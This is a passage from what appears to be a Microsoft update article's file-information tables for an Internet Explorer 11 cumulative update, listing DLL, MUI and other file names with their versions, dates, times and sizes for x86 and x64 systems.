13-Aug-2021| 21:05| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 459,776 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMemoryAnalyzer.dll| 11.0.9600.20045| 4-Jun-2021| 21:48| 1,399,296 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:43| 64,000 \nnetworkinspection.dll| 11.0.9600.19846| 23-Sep-2020| 20:28| 1,075,200 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \ndesktop.ini| Not versioned| 18-Jun-2013| 5:18| 65 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \ndesktop.ini| Not versioned| 18-Jun-2013| 5:19| 65 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 442,992 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 315,008 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 99,984 \nmsrating.dll| 11.0.9600.19507| 5-Oct-2019| 19:57| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:25| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:26| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 21:16| 2,308,608 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:11| 692,224 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \ninseng.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 91,136 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:23| 154,112 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 124,928 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 12:11| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 235,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:39| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:48| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 13,881,856 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:40| 24,486 \nieinstal.exe| 11.0.9600.18921| 9-Feb-2018| 21:35| 475,648 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:30| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:38| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:30| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \ninetres.admx| Not versioned| 11-Jan-2021| 19:25| 1,678,023 \ninetcomm.dll| 6.3.9600.20112| 13-Aug-2021| 19:39| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 4,119,040 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 19:56| 653,824 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:04| 498,176 \n \n### \n\n__\n\nInternet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:30| 2,882,048 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 21:22| 108,544 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 19:18| 65,024 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:28| 1,562,624 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 23:30| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 21:51| 43,008 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:35| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:01| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:20| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:00| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:58| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:02| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:22| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nhtml.iec| 2019.0.0.20045| 4-Jun-2021| 22:23| 417,280 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:42| 2,132,992 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:33| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:23| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:06| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:22| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:47| 77,824 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 276,480 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:08| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:23| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:14| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:48| 4,858,880 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 21:57| 54,784 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 2:49| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:36| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 13-Aug-2021| 23:22| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:14| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 75,776 \nieui.dll| 11.0.9600.20045| 4-Jun-2021| 22:15| 615,936 \niedkcs32.dll| 18.0.9600.20045| 4-Jun-2021| 21:45| 381,952 \ninstall.ins| Not versioned| 13-Aug-2021| 17:52| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:22| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:11| 800,768 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:41| 145,920 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 21:40| 33,280 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:47| 88,064 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.18895| 1-Jan-2018| 21:32| 666,624 \niedvtool.dll| 11.0.9600.20045| 5-Jun-2021| 0:16| 950,784 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:21| 50,176 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:53| 491,008 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 316,416 \nEscMigPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 124,416 \nescUnattend.exe| 11.0.9600.19326| 25-Mar-2019| 22:54| 87,040 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:51| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:23| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:51| 245,248 \nF12Resources.dll| 11.0.9600.17496| 21-Nov-2014| 19:00| 10,949,120 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:50| 372,224 \nF12.dll| 11.0.9600.20045| 4-Jun-2021| 21:50| 1,422,848 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:42| 809,472 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:54| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 23:54| 1,574 \nmsfeedsbs.dll| 